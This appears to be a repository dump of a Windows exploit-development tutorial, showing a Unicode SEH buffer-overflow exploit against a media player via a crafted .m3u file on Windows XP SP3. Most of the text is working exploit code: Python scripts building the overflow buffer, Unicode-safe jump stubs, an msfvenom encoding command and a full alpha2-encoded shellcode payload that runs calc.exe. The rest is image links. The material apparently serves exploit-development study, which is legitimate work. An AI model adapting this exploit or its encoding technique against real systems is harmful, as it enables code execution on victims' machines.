--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part3-BypassDEPwithROP/Part3-ROP3.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc.md:
--------------------------------------------------------------------------------
  1 | # Part4: From 0x00410041 to calc
  2 | 
  3 | ## Get things setup
  4 | 1. WinXP sp3
  5 | 2. [vulnerable software](http://dw.com.com/redir?edId=3&siteId=4&oId=3000-2139_4-10691520&ontId=2139_4&spi=56d8806b97a1398c96c63ce1081bdbb6&lop=link&tag=tdw_dltext&ltype=dl_dlnow&pid=10694507&mfgId=6294769&merId=6294769&pguid=T2ATdQoOYJIAADBo9roAAAM2&ttag=dl_dldirect&destUrl=http%3A%2F%2Fdownload.cnet.com%2F3001-2139_4-10691520.html%3Fspi%3D56d8806b97a1398c96c63ce1081bdbb6%26dlm%3D0)
  6 | 
  7 | ## Background
  8 | 
  9 | ```
 10 | buffer_size = 5000
 11 | buffer = "A" * buffer_size
 12 | 
 13 | try:
 14 |     print "[+] Creating exploit file.."
 15 |     exploit = open('triologic.m3u','w');
 16 |     exploit.write(buffer);
 17 |     exploit.close();
 18 |     print "[+] Writing", len(buffer), "bytes to triologic.m3u"
 19 |     print "[+] Exploit file created!"
 20 | except:
 21 |     print "[-] Error: You do not have correct permissions.."
 22 | 
 23 | ```
 24 | 
 25 | 
 26 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc0.png)
 27 | 
 28 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc1.png)
 29 | 
 30 | To solve this Unicode problem, we still follow the same thinking in past SEH exploit but need to find a new bunch of instructions which compatible with Unicode.
 31 | 
 32 | 1. Find Unicode compatible "Pop Pop Ret" address for SEH
 33 | ```
 34 | > mona.py seh -cp unicode
 35 | ```
 36 | 
 37 | 2. Find the execute harmless instructions for nSEH
 38 | 
 39 | Short jump instruction was used to jump over SEH to shellcode, in this case, we can use the execute harmless instructions to walk over nSEH and SEH.
 40 | 
 41 | For example, if nSEH = "\x61\x6E" and the location pointed by esi is writable, 
 42 | 
 43 | here is the Unicode format
 44 | ```
 45 | \x61          popads
 46 | 
 47 | \x00\x72\x00  add byte ptr [edx],dh
 48 | ```
 49 | 
 50 | As we can see, "\x72" could "eat away" the null bytes and make the exploit run harmless, just like Nops. Besides, "\x61" is a useful instruction, let's talk it later.
 51 | 
 52 | You can choose one of the following instructions depends on your case.
 53 | 
 54 | ```
 55 | 00 6E 00:add byte ptr [esi],ch
 56 | 00 6F 00:add byte ptr [edi],ch
 57 | 00 70 00:add byte ptr [eax],dh
 58 | 00 71 00:add byte ptr [ecx],dh
 59 | 00 72 00:add byte ptr [edx],dh
 60 | 00 73 00:add byte ptr [ebx],dh
 61 | (62, 6d are 2 others that can be used – be creative & see what works for you)
 62 | ```
 63 | 
 64 | 
 65 | 3. To walk over SEH, we have to make sure "Pop Pop Ret" pointer is harmless too.
 66 | 
 67 | ## Let's start it! Walk Over SEH
 68 | 
 69 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc2.png)
 70 | 
 71 | ```
 72 | buffer_size = 5000
 73 | 
 74 | junk = "A" * 536
 75 | nSEH = "\x61\x72"
 76 | SEH = "\x41\x4a"
 77 | 
 78 | buffer = junk + nSEH + SEH
 79 | buffer += "\xCC" * (buffer_size - len(buffer))
 80 | 
 81 | try:
 82 |     print "[+] Creating exploit file.."
 83 |     exploit = open('triologic.m3u','w');
 84 |     exploit.write(buffer);
 85 |     exploit.close();
 86 |     print "[+] Writing", len(buffer), "bytes to triologic.m3u"
 87 |     print "[+] Exploit file created!"
 88 | except:
 89 |     print "[-] Error: You do not have correct permissions.."
 90 | ```
 91 | 
 92 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc3.png)
 93 | 
 94 | ## Jump to Shellcode
 95 | 
 96 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc4.png)
 97 | 
 98 | So we decide to put shellcode at 0x0012e370.
 99 | 
100 | - with a register which closes the shellcode
101 | ```
102 | buffer_size = 5000
103 | 
104 | junk = "A" * 536
105 | nSEH = "\x61\x72"
106 | SEH = "\x41\x4a"
107 | jump = "\x53"   # push ebx
108 | jump += "\x72"  # add     byte ptr [edx],dh
109 | jump += "\x58"  # pop eax
110 | jump += "\x72"
111 | jump += "\x05\x14\x11"  #add     eax,11001400h
112 | jump += "\x72"
113 | jump += "\x2d\x13\x11"  #sub     eax,11001300h
114 | jump += "\x72"
115 | jump += "\x50"  # push eax
116 | jump += "\x72"
117 | jump += "\xc3"  # ret
118 | 
119 | buffer = junk + nSEH + SEH + jump
120 | buffer += "A"*109   # junk
121 | buffer += "C" * 200 # mock shellcode
122 | buffer += "\xCC" * (buffer_size - len(buffer))
123 | ```
124 | 
125 | - with good stuff on the stack
126 | 
127 | ```
128 | buffer_size = 5000
129 | 
130 | junk = "A" * 536
131 | nSEH = "\x61\x72"
132 | SEH = "\x41\x4a"
133 | 
134 | jump = "\x58"   # pop eax
135 | jump += "\x72"
136 | jump += "\x05\x14\x11"  #add     eax,11001400h
137 | jump += "\x72"
138 | jump += "\x2d\x13\x11"  #sub     eax,11001300h
139 | jump += "\x72"
140 | jump += "\x50"  # push eax
141 | jump += "\x72"
142 | jump += "\xc3"  # ret
143 | 
144 | buffer = junk + nSEH + SEH + jump
145 | buffer += "A"*111   # junk
146 | buffer += "C" * 200 # mock shellcode
147 | buffer += "\xCC" * (buffer_size - len(buffer))
148 | ```
149 | 
150 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc5.png)
151 | 
152 | ## Run Shellcode
153 | There are 2 approaches to run shellcode in this work.
154 | 
155 | 1. find an ASCII equivalent and jump to it
156 | 
157 | The ASCII shellcode which we fed into the application likely exists somewhere in memory, find out and jump to run it.
158 | 
159 | 2. Use a decoder
160 | 
161 | encode your ASCII exploit, prepend with a Unicode compatible decoder.
162 | 
163 | sounds easy but hard to code? Don't worry, we have two free tools.
164 | 
165 | - [vense.pl](http://www.phenoelit-us.org/win/)
166 | 
167 | Decode the shellcode to a new location, then jump to execute it.
168 | 
169 | you need to specify two registers, one points to the beginning of decoder+shellcode, the other points to a writable location for new shellcode.
170 | 
171 | - [alpha2 ](http://packetstormsecurity.org/shellcode/alpha2.tar.gz)
172 | 
173 | Decode the shellcode in-place and execute it, you only need one register that points to the beginning of decoder+shellcode.
174 | 
175 | Since alpha2 was adopted in Metasploit, let's use alpha2 to encode shellcode. suggest eax points to the beginning of decoder
176 | 
177 | ```
178 | msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX -b '\x00' -f python
179 | ```
180 | 
181 | 
182 | ## put them together
183 | 
184 | ```
185 | buffer_size = 5000
186 | 
187 | junk = "A" * 536
188 | nSEH = "\x61\x72"
189 | SEH = "\x41\x4a"
190 | 
191 | jump = "\x58"   # pop eax
192 | jump += "\x72"
193 | jump += "\x05\x14\x11"  #add     eax,11001400h
194 | jump += "\x72"
195 | jump += "\x2d\x13\x11"  #sub     eax,11001300h
196 | jump += "\x72"
197 | jump += "\x50"  # push eax
198 | jump += "\x72"
199 | jump += "\xc3"  # ret
200 | 
201 | buffer = junk + nSEH + SEH + jump
202 | buffer += "A"*111   # junk
203 | 
204 | buffer += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51"
205 | buffer += "\x41\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44"
206 | buffer += "\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41"
207 | buffer += "\x51\x41\x49\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50"
208 | buffer += "\x41\x5a\x31\x41\x49\x31\x41\x49\x41\x49\x41\x4a\x31"
209 | buffer += "\x31\x41\x49\x41\x49\x41\x58\x41\x35\x38\x41\x41\x50"
210 | buffer += "\x41\x5a\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
211 | buffer += "\x41\x49\x51\x49\x31\x31\x31\x31\x41\x49\x41\x4a\x51"
212 | buffer += "\x49\x31\x41\x59\x41\x5a\x42\x41\x42\x41\x42\x41\x42"
213 | buffer += "\x41\x42\x33\x30\x41\x50\x42\x39\x34\x34\x4a\x42\x4b"
214 | buffer += "\x4c\x49\x58\x55\x32\x4b\x50\x4b\x50\x4d\x30\x51\x50"
215 | buffer += "\x55\x39\x39\x55\x30\x31\x49\x30\x53\x34\x44\x4b\x42"
216 | buffer += "\x30\x50\x30\x34\x4b\x42\x32\x4c\x4c\x54\x4b\x31\x42"
217 | buffer += "\x4d\x44\x54\x4b\x44\x32\x4e\x48\x4c\x4f\x58\x37\x4f"
218 | buffer += "\x5a\x4e\x46\x50\x31\x4b\x4f\x46\x4c\x4f\x4c\x51\x51"
219 | buffer += "\x33\x4c\x4b\x52\x4e\x4c\x4f\x30\x39\x31\x38\x4f\x4c"
220 | buffer += "\x4d\x4b\x51\x47\x57\x59\x52\x4c\x32\x52\x32\x51\x47"
221 | buffer += "\x44\x4b\x51\x42\x4e\x30\x54\x4b\x50\x4a\x4f\x4c\x54"
222 | buffer += "\x4b\x30\x4c\x4c\x51\x32\x58\x4b\x33\x30\x48\x4b\x51"
223 | buffer += "\x4a\x31\x32\x31\x54\x4b\x30\x59\x4f\x30\x4d\x31\x38"
224 | buffer += "\x53\x34\x4b\x4f\x59\x4e\x38\x39\x53\x4e\x5a\x30\x49"
225 | buffer += "\x44\x4b\x4e\x54\x34\x4b\x4d\x31\x4a\x36\x30\x31\x4b"
226 | buffer += "\x4f\x36\x4c\x37\x51\x48\x4f\x4c\x4d\x4d\x31\x38\x47"
227 | buffer += "\x50\x38\x4b\x30\x53\x45\x4b\x46\x4b\x53\x33\x4d\x4a"
228 | buffer += "\x58\x4f\x4b\x33\x4d\x4f\x34\x34\x35\x4a\x44\x42\x38"
229 | buffer += "\x44\x4b\x30\x58\x4f\x34\x4b\x51\x39\x43\x53\x36\x54"
230 | buffer += "\x4b\x4c\x4c\x30\x4b\x54\x4b\x42\x38\x4d\x4c\x4b\x51"
231 | buffer += "\x48\x53\x44\x4b\x4d\x34\x54\x4b\x4b\x51\x4a\x30\x33"
232 | buffer += "\x59\x31\x34\x4f\x34\x4d\x54\x51\x4b\x31\x4b\x51\x51"
233 | buffer += "\x30\x59\x31\x4a\x32\x31\x4b\x4f\x4b\x30\x51\x4f\x51"
234 | buffer += "\x4f\x31\x4a\x54\x4b\x4c\x52\x5a\x4b\x54\x4d\x31\x4d"
235 | buffer += "\x42\x4a\x4d\x31\x44\x4d\x35\x35\x46\x52\x4d\x30\x4b"
236 | buffer += "\x50\x4b\x50\x30\x50\x32\x48\x4e\x51\x54\x4b\x52\x4f"
237 | buffer += "\x54\x47\x4b\x4f\x48\x55\x57\x4b\x4a\x50\x46\x55\x47"
238 | buffer += "\x32\x32\x36\x32\x48\x47\x36\x35\x45\x57\x4d\x35\x4d"
239 | buffer += "\x4b\x4f\x48\x55\x4f\x4c\x4d\x36\x33\x4c\x4b\x5a\x35"
240 | buffer += "\x30\x4b\x4b\x39\x50\x44\x35\x4c\x45\x37\x4b\x31\x37"
241 | buffer += "\x4e\x33\x54\x32\x42\x4f\x51\x5a\x4b\x50\x32\x33\x4b"
242 | buffer += "\x4f\x48\x55\x32\x43\x31\x51\x42\x4c\x42\x43\x4e\x4e"
243 | buffer += "\x31\x55\x32\x58\x53\x35\x4b\x50\x41\x41"
244 | buffer += "\xCC" * (buffer_size - len(buffer))
245 | 
246 | try:
247 |     print "[+] Creating exploit file.."
248 |     exploit = open('triologic.m3u','w');
249 |     exploit.write(buffer);
250 |     exploit.close();
251 |     print "[+] Writing", len(buffer), "bytes to triologic.m3u"
252 |     print "[+] Exploit file created!"
253 | except:
254 |     print "[-] Error: You do not have correct permissions.."
255 | 
256 | ```
257 | 
258 | 
259 | ![](Part4-From0x00410041toCalc/Part4-From0x00410041toCalc6.png)
260 | 
261 | ## Ref
262 | 1. https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
263 | 2. http://www.fuzzysecurity.com/tutorials/expDev/5.html
264 | 
265 | 
266 | 


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc0.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc1.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc2.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc3.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc4.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc5.png


--------------------------------------------------------------------------------
/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/RingLcy/VulnerabilityAnalysisAndExploit/962e808058d273521bca50a22ef570dbf9083581/WindowsExploitDevelopment/Part4-From0x00410041toCalc/Part4-From0x00410041toCalc6.png


--------------------------------------------------------------------------------